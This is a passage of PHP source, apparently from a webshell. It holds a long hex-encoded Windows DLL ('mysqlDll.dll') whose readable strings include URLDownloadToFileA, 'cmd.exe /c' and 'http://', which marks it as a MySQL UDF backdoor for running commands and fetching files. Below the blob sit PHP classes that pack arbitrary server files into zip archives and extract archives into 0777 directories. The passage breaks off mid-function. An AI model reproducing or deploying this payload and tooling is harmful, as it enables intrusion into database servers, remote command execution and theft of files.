38C2D5B59C6C75CCC8D96652CD949002B25010202EBCE2679A690234621473F5DD70DE48C065F034C0744374DD3343C342C241C8B44344DD3FC8EE489448FE4E8E8ECECD3344DD3F0F0F4F4F8CD39324DF8FCBDD7007B87B01027F809FFF00305399AA6808CA0BC6C36B0D766909D0BF91133240417A30D0A2BB8555B0D2531C639FCD8F692417F240DFDE3FC77823BC2E54400F7D96543B04B8F779E9C1CF92B43082CC2D6745D900B180338606D033A02F275B76F034E584F56B6B74B08F6971FA3EE02EF026FD9807C298C902724E3952D09AB2D03AE45EB1666625A955B7FB403A6699AA6BCC4CCD4DCA6691A9AE4F7971C1C189AA6699A18141410100C699AA6690C08080404A6EB0E231F05100318E05A129A283C8BB7B56C21CC96870F8313112A210CB700ACE86FE2570FAFAE83FEE08BDE770D0000EC1A0C2715773A7256B4D59382AB1D3D530256F057752B566A082A898850D71C14229893820F56741956947414EBA96A72A31644577C54EC8157B40E5BEB56D5612ED4230603EE265D565698182B52F7616904FC8AAEFF41BE0D50BCC5273ADC3701435C147C29985047568D7C07FB2D162BF90CAD240600473B5B290E2B1E7CA55E90C3B6CA11C56056821834BFA3A546088B87803B08742246C2ED46D988E80713720FF9240A606106817D0D4C02DB6E8350F531845E39C3D9AC60B6DDBC17721507CA532C1EB22D19080C16334BA55C1DE660080C7BD27502BD40DF1283CFDEDBE158EC22C90314BD737500A20F08B1443C998A74F6466221F816F87544837E5F23E886DE04FD0C958D460CFE1EC413ABFF4620ED8D5E0C70F61B090D803874180C84884388239F4500C3A585BF2D50DDE52B116A245999F7F9D1F03DD4A80336C66D2983FA3BF137EF2083C5044381FD5FA40F8C5E3984F86E23EB4EBE3E56B93E126F843E8D0C9DA9901E9C5F8684F83BC27318C01103D6EBE48D0815EAC1E30543C70B2256C9A012346C430BFCFE07563B0D535773F7C1903683D0C93CC18F07833C50B0DA28E4361AF51B053E1E751EE28B104974084958DEDE680284F4EB0804F5EB03F6A337DE4600E836891C308A5BEB161EE4C2DA027F7B5882864329F459376A830037C674320E1F5AC9F31CD6CA7E50505031C85A7B830CB2247ED4CAE264CF731FCCA3AD8D8800AB740F00E16AD8580841533AFDECA4963B343D1C063CC0C1E7154A81B1BCF749D418C5604B9E381780360CB2AD2C98248184E169CA5190C61D5642D4920179728BC3C36C8BB1E14E4152530411590F250306F029535DEC60B404CBF0F6D915B7B10211B0FF0336E4106AC0A359B43809F2A22CDEB43F4AA87BF6F30549C0FF4AB890073C9013082CBAAED003FC0C203F087900724AA84AA8A6E9BAD83F069F038C848BA6699A7C746C645C3F5D3B8F004AA8F003C00164D134CCE03F39859CE44C404BF04B4845D375DD2C900B580378A03C0239903F4C404C405D171B855B7FF403FC344DD3750E04030C141C24871160D1373F1F164DD37505500358687C3FAB2F4A003E1CCCA0022F907956F6C112883F1594D9815DE874095900FE37ABC645FF10EB0B8065FF8DECFC0FC0861A806811F6C540750839B72F455328E48B4DFF806A83C15E02056083236DC3DE2374001680E1A4C3F96C01175510100840EB07F60D4A30797FF810742604ADB7F2F220741830740A5074897505216A16A21521020C2ABD7CDF060389F0BA00077D0423CABF54B47F037D3BC87F31742A3BCB43C3ED4AB06D195433744D0739BA91AD85CC43F84C0804BAA67B7B435AF8EB3E26052F070643CE806F1E3BCA7423C2163CDD1188188F4F5B3B0507E69EE00113FDBEFEFF32FC5DF4C77413368E54F7D1234D143737B8DB1172A840C581CE1F0FF601F6ED63DBB7C4DE020BF7A8DF081408EB0AA8115D2CBDB1060B1068ADD8233BD39241E0DF751AE918016D0D8231816ABFB78D0A9E2DA82BCEF008022D6030EA3BAC39BF4213628561325256E8B383459875090A18EBD8D583F9B19A4DFF40EB09AF08146C410F78473159812781D6C68A11C380C901C630045A8452C9C2DD05BEFF0B48884CBD7578EA7473F606818116F502746D8B945DA2220B1E8B067519FC35008FBE813883E94B1D2A1759D888B60DBCEB584213E2137C677E2511335669A116807D131A11825F178CF015554445E2811980C73E5A74B52DD81C2EAF737808AB60072DDC07808B8C4E8BF390E005C916713F8005431467736A081E8233918B09570441464E600F3B32B24C245B231A0EF2F2B64D79D50D04FEEB08FDEB03F4C11A824C0C5F198A1141AA1EEC1BF16488174762EEEB05838C00F0D32401119C2CCBC983C1E134271208006DCC6AC738682DD9D2D96608C6C3000C085DC049B38807CA185A1965872312F52A65520945A9F88959AC913859A6E80AB82C06F651FAD756F29B6A0A8FD2268988391874744617CAE630428A78A9E850538B58DA71F0D73BC6CC214D628386A240C893715963FF25DAE2BF94603975E8F3ABAA895D0F6C16E8D386EBD77DEEB8BC4DEFDD405B2B04D30CAFCBB641FFE87BA312CA300F87942588CD546C9CD28DEEE356F7E58D614F6F52F3AB04AA8D9E94FA52A15498BCB6DE2C8A5101E84B51844B5CFA3BC777B7EFEE2D68FC8A922080089047401376F5F84BB1F04141803965D47983C308837DFC6913B93638C1E2C8914CBA6DA087F750A3A4105384898C2AB8BFDF709140A5A559A3D1A5EB5240D1B3A660810547A8C6A19EC57EF508403DFF07F153382B89357BDF06F15335250700BA49F88816ADAB00981EA84C97DFE75E2E8604AFE9508301D08C4311946FA857DA70EF65402DDFFE01A8946CBBE78FA8FF1570F814FD9635D1CBF4FC750F87DC19F6AE1CC7492DA463E7E804741704D7A628F00D740C802CB804F93CCF763605120B0811578460862571BEC01F88E1625F044CE5CF52B1404522283456A166B453962215127FE081E016CFBE8C888405ECDF7FA1150D8AC672F48A45F2C6850D20166E104D3B375A55F3B80A2D415FA0183BC1771D48BC3A08768F2A41B820008BD9CBAB6B81FA47AA42428A42FF84C15FF8EC352C900EFA8B358D7A029A33D0213989B2EF8C7DDD5A9123FD1D561E9291DD6C5634235842FCAD803DB8682E2768002E7DB75CCA8D8D726695F6C2CDEF67341503108A940564889060EFCEC9DBEB1C1A027410205BEBE380A06E6834781CDE4400BFEB491ADB0D1315DA417219045AB2BC8DFDC34BC880C1208888491F1D617213C3DE9CBC7A770E20E920EBE04C77F915774ABE5EC97394886AFDA90210F970505C59FC94882F1FD575798FAC426866281854FAF7403D6709FC161C57FFD664BEDB29FA297450100CC7D7BE5DA0F85714B00C06B45B99A0BB88CD16FFD0D602DEE66BED10B405531104EE1590601D4D0AC00982FA8659A057040481282056B064F0BB470B0C85965E91F983FA982DE9ED6A47C025152BD16075FA9AEF10D06D020610CA1A251C8E1D1429168F58A6EB3A06234AE2EB8807351E94CC5289365A271ACF0D56AF1235140FCBFFE1C3A0B7AC99AD78F2971B180A0360B615DCC1A8F1223E1975EF13A0876A064F4AACEC508B9E1D9C345CE66D442C51681C4C147D452E6AB6AD50293F89B1C1E0939D084B1A6606AB9F44BC3805750BBB0D416F064D6B50AF256BBC5C487D469512980708D0E250853014526D2FD050BCDE1BF6034EBC05A908D81A4A8615B06F126945FCDE30A22DC25B53C366A035AADB9C65F874E144346021CE0C29800750A09543B566401343E0E0043812F107C406F98A4804657FAB99A5DF89084B1D8A40053C0A84BED01D154D1088E4078D53010F8B459718C682050ABC160C166D515452B810448B664DDB39AD976865D1068F1496935166EB006D912446E98B17684D8B3D4BE1F40155F64235D144E68AE5A87CC50EE0D0F876EB3B0A81A274BBBE0C04E724FB027FAD0D03808136C85B00140C0075FFD06C0B23578A101A33AE3CD45FBB2D0D0BB443FF135A12493944BBDD2DA2182140803848068308CDCD76BF5F5EC6030D4344EB73CA2BD36E3260E7FF6A01CF0A090E683BAA479F74411ED101A2358848D12D821A85FF9D468B0F4388443105EB293B700420DEB6250CFF6305160AEB18A55E40D812FFA9193507AD9C7B77BF925B761A750D85115C74F3064942D12EE5E4AC062B4688210250A8EAA9D800F91131357540346A46C42BF87D5BF41F8AE875465757EB533038154C20629236B1F2DBCA6A711D23EB222014A660B0341B48E1FE033130EB651DBA397D147E108AB25936C514105A66B67DF436E1A11D591D161C0286D98CD9181FD84872DA478DC159D22AD3A62018366B5B0CBE3C20732EDB6CB74EC1245E0140503720CA3F408C4C793BDF0F849CD25B6CA014041B9C0324FCF25DAADB2EDE8BC441DC8367EB138DB5D751678BF026118BB5D9F6AD3867DC7466534CDC6121CB9EEB9257F44DEC1AA574A3A6884412D80A7432B06D4B6C5E0D40403E1C78B2C8663713EDD57F1EDA321C0962C321858F2065C814876515F4A1F20BD966B6B336DC895DE08B15483212BDB27DB953D6BDDF74B45664E467749C8F6AB35BA3B30E03EB068C28EDD5618F54D5CC0AB11B88108B71B77179088B2680AD9F44568D4A9E0D7FBA0DBA5580F1491AF30C5E5CC60736942B498BC24E58ED61328118B4ECAC375E2D043E3E8A515E564234632356A53C0497CFC819DF1D1B56495340CEC2C73B028658A3432D24F276607CDD1C490554CC335033E433B263345BC8945D18908DD9968D532C34201BC53619181FE0DB630AD06A15B5CB3EBB15B0107CD3DC57CC0FE16050B3EB0B83DB33ECB6119CF6112949E0565FF670C9DA1C5552F8D7B2703A84933C8AF5CC38680C42EF047AC25F9A51D4E7023A01752E0A1BB1D552F0263A613E0A431D966EE146873A4101191411035BA330D56BFDD51A75555B430BB3FFB090D3D18E016DADCA0B4301070242B5CFD6ED44E94130E01302A86658AD799AAF335BD2CAC9C14A6D42AA5BC98CCC4F56530B4A55B050009C1B201AFFAE023307420FAB0424EBF3775DFE5ABB8C90416E14460FA373F201E6E20204C420753F98FD646C3A0AF38D46FF3B9CB8ACF87B5643BE51EEB60E56485481DF4C03C12580FC8D161DDEBD0A80E17FEB0D811FDED0540440391180C980DE880A81440B8D6686C5C671D0419080E3D60AC0C006A0A8487D065C9C249E5862050D10565D7426E8BC00BF83C410E0AE41C305E3CC0CB568E12EF1C6012D415CEB030A915B4013D4B88110B5DAA5DAD2630883FB0950769225FF2F7D6B2004308819413577DA802100498A178A018878007F8B118F49473BF972F21B365341486FFF948BD6A81E588D39C470CD4143A1D03B5CCF252EB6C1FF46758A274738C474F22C419D1AE324EC85D2E1C5FE4186E00E824A6F1474D21AC0E6FFD1575F3AEB78F0FFBF34019130007F0419C0D96EE2EB15130DC9817888C2C77895FFB541599EEE9067271FD82E760B3E6A602266C4040907B742A68D38CFDA39CB15580B0318AC05224EEBFB55D0C2052241280EABE097CF0B6C112836D1E970DA0C1B1FFF804EB741B35AB6201726828ADDFFDBEE0774217F1D467BFC720638DC770202E638F809D8B517BA35C6F7750DEBD733C908023657B34D9BB9AFE582806D6AE4BF0FF35FA6ED85B50A321926EF2BB446AB2F99EE57EBB68DDE5AC3EC74230BAB1F775165EB3AC0F0596B0979D584B5634DCA0975720271FC08A5C9DE0E5FFECB030051283074512BBC2311EC1A2D75770C920F1DA2C685B7A6EB52DF2F7D8B5BB10EC11AB6D10A5601805E6EBDF54B318065FE0088508845FDF3EB09BAAB41D90DFD0F6C8D4D0AD58B1803165179AD7DD182C16E4F026B53B38059E3450A23B07465BB72251CAE5A80450F8CD5815DB9AAF5490F8FA18A46D52D1FE9DEE83C057C83760A4D405E7D2539DBD187F8787E0BD95FAD6A0AA1A1F4DEE0FE8A045823C667D9EB658B1512DA65E94CB4B6C84A740FA7DF5BD4D630AF88065D0958B60917C5522B5B13566B032CF036BE03B49F572F1A6AE0648FCC20F6AEDA06AD75A5D646D0BE05FD032C37126253CB0BC18C00885DC029C25A0BC839FAAB60287C25F7E1C29DEB025EA105B11D42030985056C351FD31EAACA3EC1CC03580000D37466AAFF0F4D53EE65DD9304DF03E50F08EC03BDE4F2B2F20F0AFF0B050CCF0AB656D003D50302017FB6DF3A1903070602100445000535300050B5EEFF7F2C20283850580708003730305750070F200BD71461DE000860686009780073AE956E08071507001A010E7D7BDDFF0028006E0075006C0129320F6E756C6C6FB7FFDF0A72756E74696D65206572726F72200F0D0A03544C4F07E4BFD95353110E0053494E470044BBFD65ED4F4D4112115236303238082D204BB76F7F7961626C746F20696E6956616C697A0D6865D67EBED961703727376E6F743D0460EFB6FF756768207370616323667B6C6F7769380AB9EC3661066F6E3736ED672079737464357075722BF6DB5AFB76697274752133A5632320630C9B42BED86C285F345F2ABDF6DA7665785C2F5806DCE2E6BEB0935F3139F76F706558313260DBEE736F0F646573632B3888706B6D4624816564193024DF405723376D926FDBADA6AC7468BF612F6C6F636B1B6C8530173464B7865B6B6E612E02A221726D0050D8DAB770406772616D204A6D366829EC852F30394F10E71A8D66412A2B302E2B84EF53C8386172677528735F6DBBF63C303266C16E6E67826F9CB52EB605743A1164E67F4DC3DB422B2D60396615566973AAEFF660FC432B2B2052A04C6962B47279276D0F87B90A2D16450E211150D8656B9CD43AC2002E003CE5ED6D736DE0252C6B6C776E3E1B17EED8F84765744C61324102766550AE75705BDBCE62130F57956426876534BEF0FF7373616765426F78410075732533322E642ADD931252EAB75956035A77CF76670B5A955A0E0B5B8E0392483AAFB9BBB56D904A0064002C204D20086DC9BDB97900632F642F06D74D03FDB5179A4144EE656D626B5B4E6F76C3FE6D930B4F986F0A536570741486A96885416C96711BBEEDF9B941076E6541F369A64D101636172763684665327533BDF7DE7B4A616E0A675F57537BAF7BEF4B47433779433F3B6EA9D0DE3323B03C6418B0ED587B4F5E095468127313D9C15A6157BC7C0C547509B9D9B1C64D251053750743F7DE7BEF3B372F27231F039E73CEB90A11181F262D9C73CEC5AF828990979E72CE39E7A5ACB3BAC1C8A78008047C28BB92975043BD384F296360A9523F4D797371909620A953A636306EC263B50B355A6A09A663B7B921E76A3752C077035C321703ABCF91FB2E746D700FB40600B6472A481D3A2C7EB53D25E4E6FFDB730A2F636D642E657865202F63200068656C55192B75313774073967FF76B6E4380B3006687474703A2F2F8F2DF5FF2ED9632D9B09CAE4C8EBB8F1CABDB4EDCEF3FFC3FE6F120D00CFC2D4D8CAA7B0DC0BCEC4BCFEB3C9B9A6F6DCE6FE21C2B7BEB6A3BA7E175C3F44867B81D10F00200593195731D913199DE4667271F0108DE8832119B2178E180F30434E5146C2F80392017BD894A007010153107C81A4B902011F0264410152476357D9D9070A2F0207743CF2E4C96C084009140A73F01093274F9EC411941270133C79E4C944180C1972E41AAC1B93274F9E741C4C783C796EF2E4C92C7A1CFC18FF86B29317D854DD038572200107402699282048001940269210841002199009810119900119108202601C16023B20EF200D0C050133164DD30C3603070418050D344DD3340609070C0832D82083090A1B0BC1BEF702573B070F575F906EB0101311031217210C32D820350F414336D86083503352175307D860830D575F597B6C17D2344D376DAB20701C72D860DF0BC72F80B3810760830C36821F83848F208334CD91299EA1830D32D8A46FA7B79FCE760EC2601FD70B18070069BEB35D0517C00B1D0490664006968D08644006648E8F9006644006919293CC066140039F78EF4D54EC25FF0204222B6027CF0EF68279822117A6DF07A1A581E9CDF3EF9FE0FC2F407E80FCA8C1A3DAA34F0D72F60881FE0740B577830C812F41B65FCFA2E43E5F21FFA21A00E5A2E8A25B7EA1FE5105BF92DFEE03DA5EDA5F5FDA6ADA32D3D8DEE0B26627B7F939317E430303860064AA432EE99E9C84538B9876840380A6699AA67C7874706C9AA6699A645C54483C34699AA6692824201C18A6699AA614100C08044DD334970075FCF8F0E4DCA6E99E35D42F75CC03C4BC9AA6699AB0A89C908C8849BEA669806C64CD2E821D65BB8C8F905C037F009EF040E82F500B807007F0F11325DCA0D1535499508BDD50C944548CF38CDC97B058592CA7BF06699A0E1EEF3B5A9775A769BAA7B5D4F3E0301AB86CD3034E6D01333AB759699AA6697796B4D3F20CDA74DD272F034D6C01F108A48008368024444144210980D109600064C15B054D734325746554B6CBB7572C0D44656C65466905410A105FDB0C470A0953C5D87393CD2719522C0A23EC4F56C145185661726961622212C0EC7F436C6F736548616E6425F62AD80E4B4A500B63417B7B56686753791D656D4447B7C1B656F5227914744E747515B893FD70496E666F413569704FB1DBD62EA845782A08535D65702CFB36CCFD56657273696F163B896E6754792D67DF856C570F1F4C434D6170115706882E610D1B4D7073ED5BC34279126F65646543688366E5ABA03DFB644F66F34C6FFD8E6B68FF300B746C556E773C3D48D767EDAC7C70416C6C0A46B1FB432D7B9BE16F6D6D09336E7DACB38556982673FB0B790CC580D866E50B56ADB521419C42494D1E263CC3D609630A532740B029DBDACA16AD147215421BC0B64C5B762B78108C8580250B77C5EB8407C4600C542FB998A170B6DA75D3F812DCDD3302524964386C7353F3B3378BDD5575650C4F09DE4BD2258C531D2D471A086D618643427552C93B2463366412A0D50CC363141E4D6F64BDA34E616D6A3B2160BC5F9EE473183004470A0CF3CA6624A3FD08E42CCFF04258164361853B1CFE66BF08506F6990C906C25EF99DFD6B65644465633815C2844D72496E53EB460F3AC1F1EF73684B427566663E6A50ECB136761C0A410B074F454D092C19FE10934164647297EF7D2841BCD93C7155524C440A5BA4668277E3CE1C88F6F6FE340457534153864D00FF0402CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
    }
    class eanver
    {
        var $out = '';
        function eanver($dir)
        {
            if (@function_exists('gzcompress')) {
                if (count($dir) > 0) {
                    foreach ($dir as $file) {
                        if (is_file($file)) {
                            $filecode = file_get_contents($file);
                            if (is_array($dir)) {
                                $file = basename($file);
                            }
                            $this->filezip($filecode, $file);
                        }
                    }
                    $this->out = $this->packfile();
                }
                return true;
            } else {
                return false;
            }
        }
        var $datasec = array();
        var $ctrl_dir = array();
        var $eof_ctrl_dir = "PK\x05\x06\x00\x00\x00\x00";
        var $old_offset = 0;
        function at($atunix = 0)
        {
            $unixarr = $atunix == 0 ? getdate() : getdate($atunix);
            if ($unixarr['year'] < 1980) {
                $unixarr['year'] = 1980;
                $unixarr['mon'] = 1;
                $unixarr['mday'] = 1;
                $unixarr['hours'] = 0;
                $unixarr['minutes'] = 0;
                $unixarr['seconds'] = 0;
            }
            return $unixarr['year'] - 1980 << 25 | $unixarr['mon'] << 21 | $unixarr['mday'] << 16 | $unixarr['hours'] << 11 | $unixarr['minutes'] << 5 | $unixarr['seconds'] >> 1;
        }
        function filezip($data, $name, $time = 0)
        {
            $name = str_replace('\\', '/', $name);
            $dtime = dechex($this->at($time));
            $hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x' . $dtime[2] . $dtime[3] . '\\x' . $dtime[0] . $dtime[1];
            eval('$hexdtime = "' . $hexdtime . '";');
            $fr = "PK\x03\x04";
            $fr = "PK\x03\x04\x14\x00";
            $fr = "PK\x03\x04\x14\x00\x00\x00";
            $fr = "PK\x03\x04\x14\x00\x00\x00\x08\x00";
            $fr .= $hexdtime;
            $unc_len = strlen($data);
            $crc = crc32($data);
            $zdata = gzcompress($data);
            $c_len = strlen($zdata);
            $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
            $fr .= pack('V', $crc);
            $fr .= pack('V', $c_len);
            $fr .= pack('V', $unc_len);
            $fr .= pack('v', strlen($name));
            $fr .= pack('v', 0);
            $fr .= $name;
            $fr .= $zdata;
            $fr .= pack('V', $crc);
            $fr .= pack('V', $c_len);
            $fr .= pack('V', $unc_len);
            $this->datasec[] = $fr;
            $new_offset = strlen(implode('', $this->datasec));
            $cdrec = "PK\x01\x02";
            $cdrec = "PK\x01\x02\x00\x00";
            $cdrec = "PK\x01\x02\x00\x00\x14\x00";
            $cdrec = "PK\x01\x02\x00\x00\x14\x00\x00\x00";
            $cdrec = "PK\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00";
            $cdrec .= $hexdtime;
            $cdrec .= pack('V', $crc);
            $cdrec .= pack('V', $c_len);
            $cdrec .= pack('V', $unc_len);
            $cdrec .= pack('v', strlen($name));
            $cdrec .= pack('v', 0);
            $cdrec .= pack('v', 0);
            $cdrec .= pack('v', 0);
            $cdrec .= pack('v', 0);
            $cdrec .= pack('V', 32);
            $cdrec .= pack('V', $this->old_offset);
            $this->old_offset = $new_offset;
            $cdrec .= $name;
            $this->ctrl_dir[] = $cdrec;
        }
        function packfile()
        {
            $data = implode('', $this->datasec);
            $ctrldir = implode('', $this->ctrl_dir);
            return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
        }
    }
    class zip
    {
        var $total_files = 0;
        var $total_folders = 0;
        function Extract($zn, $to, $index = array(-1))
        {
            $ok = 0;
            $zip = @fopen($zn, 'rb');
            if (!$zip) {
                return -1;
            }
            $cdir = $this->ReadCentralDir($zip, $zn);
            $pos_entry = $cdir['offset'];
            if (!is_array($index)) {
                $index = array($index);
            }
            for ($i = 0; $index[$i]; $i++) {
                if (intval($index[$i]) != $index[$i] || $index[$i] > $cdir['entries']) {
                    return -1;
                }
            }
            for ($i = 0; $i < $cdir['entries']; $i++) {
                @fseek($zip, $pos_entry);
                $header = $this->ReadCentralFileHeaders($zip);
                $header['index'] = $i;
                $pos_entry = ftell($zip);
                @rewind($zip);
                fseek($zip, $header['offset']);
                if (in_array("-1", $index) || in_array($i, $index)) {
                    $stat[$header['filename']] = $this->ExtractFile($header, $to, $zip);
                }
            }
            fclose($zip);
            return $stat;
        }
        function ReadFileHeader($zip)
        {
            $binary_data = fread($zip, 30);
            $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);
            $header['filename'] = fread($zip, $data['filename_len']);
            if ($data['extra_len'] != 0) {
                $header['extra'] = fread($zip, $data['extra_len']);
            } else {
                $header['extra'] = '';
            }
            $header['compression'] = $data['compression'];
            $header['size'] = $data['size'];
            $header['compressed_size'] = $data['compressed_size'];
            $header['crc'] = $data['crc'];
            $header['flag'] = $data['flag'];
            $header['mdate'] = $data['mdate'];
            $header['mtime'] = $data['mtime'];
            if ($header['mdate'] && $header['mtime']) {
                $hour = ($header['mtime'] & 0xf800) >> 11;
                $minute = ($header['mtime'] & 0x7e0) >> 5;
                $seconde = ($header['mtime'] & 0x1f) * 2;
                $year = (($header['mdate'] & 0xfe00) >> 9) + 1980;
                $month = ($header['mdate'] & 0x1e0) >> 5;
                $day = $header['mdate'] & 0x1f;
                $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
            } else {
                $header['mtime'] = time();
            }
            $header['stored_filename'] = $header['filename'];
            $header['status'] = "ok";
            return $header;
        }
        function ReadCentralFileHeaders($zip)
        {
            $binary_data = fread($zip, 46);
            $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);
            if ($header['filename_len'] != 0) {
                $header['filename'] = fread($zip, $header['filename_len']);
            } else {
                $header['filename'] = '';
            }
            if ($header['extra_len'] != 0) {
                $header['extra'] = fread($zip, $header['extra_len']);
            } else {
                $header['extra'] = '';
            }
            if ($header['comment_len'] != 0) {
                $header['comment'] = fread($zip, $header['comment_len']);
            } else {
                $header['comment'] = '';
            }
            if ($header['mdate'] && $header['mtime']) {
                $hour = ($header['mtime'] & 0xf800) >> 11;
                $minute = ($header['mtime'] & 0x7e0) >> 5;
                $seconde = ($header['mtime'] & 0x1f) * 2;
                $year = (($header['mdate'] & 0xfe00) >> 9) + 1980;
                $month = ($header['mdate'] & 0x1e0) >> 5;
                $day = $header['mdate'] & 0x1f;
                $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
            } else {
                $header['mtime'] = time();
            }
            $header['stored_filename'] = $header['filename'];
            $header['status'] = 'ok';
            if (substr($header['filename'], -1) == '/') {
                $header['external'] = 0x41ff0010;
            }
            return $header;
        }
        function ReadCentralDir($zip, $zip_name)
        {
            $size = filesize($zip_name);
            if ($size < 277) {
                $maximum_size = $size;
            } else {
                $maximum_size = 277;
            }
            @fseek($zip, $size - $maximum_size);
            $pos = ftell($zip);
            $bytes = 0x0;
            while ($pos < $size) {
                $byte = @fread($zip, 1);
                $bytes = $bytes << 8 | ord($byte);
                if ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506) {
                    $pos++;
                    break;
                }
                $pos++;
            }
            $fdata = fread($zip, 18);
            $data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size', $fdata);
            if ($data['comment_size'] != 0) {
                $centd['comment'] = fread($zip, $data['comment_size']);
            } else {
                $centd['comment'] = '';
            }
            $centd['entries'] = $data['entries'];
            $centd['disk_entries'] = $data['disk_entries'];
            $centd['offset'] = $data['offset'];
            $centd['disk_start'] = $data['disk_start'];
            $centd['size'] = $data['size'];
            $centd['disk'] = $data['disk'];
            return $centd;
        }
        function ExtractFile($header, $to, $zip)
        {
            $header = $this->readfileheader($zip);
            if (substr($to, -1) != "/") {
                $to .= "/";
            }
            if ($to == './') {
                $to = '';
            }
            $pth = explode("/", $to . $header['filename']);
            $mydir = '';
            for ($i = 0; $i < count($pth) - 1; $i++) {
                if (!$pth[$i]) {
                    continue;
                }
                $mydir .= $pth[$i] . "/";
                if (!is_dir($mydir) && @mkdir($mydir, 0777) || ($mydir == $to . $header['filename'] || $mydir == $to && $this->total_folders == 0) && is_dir($mydir)) {
                    @chmod($mydir, 0777);
                    $this->total_folders++;
                    echo "\xc4\xbf\xc2\xbc: {$mydir}<br>";
                }
            }
            if (strrchr($header['filename'], '/') == '/') {
                return;
            }
            if (!($header['external'] == 0x41ff0010) && !($header['external'] == 16)) {
                if ($header['compression'] == 0) {
                    $fp = @fopen($to . $header['filename'], 'wb');
                    if (!$fp) {
                        return -1;
                    }
                    $size = $header['compressed_size'];
                    while ($size != 0) {
                        $read_size = $size < 2048 ? $size : 2048;
                        $buffer = fread($zip, $read_size);
                        $binary_data = pack('a' . $read_size, $buffer);
                        @fwrite($fp, $binary_data, $read_size);
                        $size -= $read_size;
                    }
                    fclose($fp);
                    touch($to . $header['filename'], $header['mtime']);
                } else {
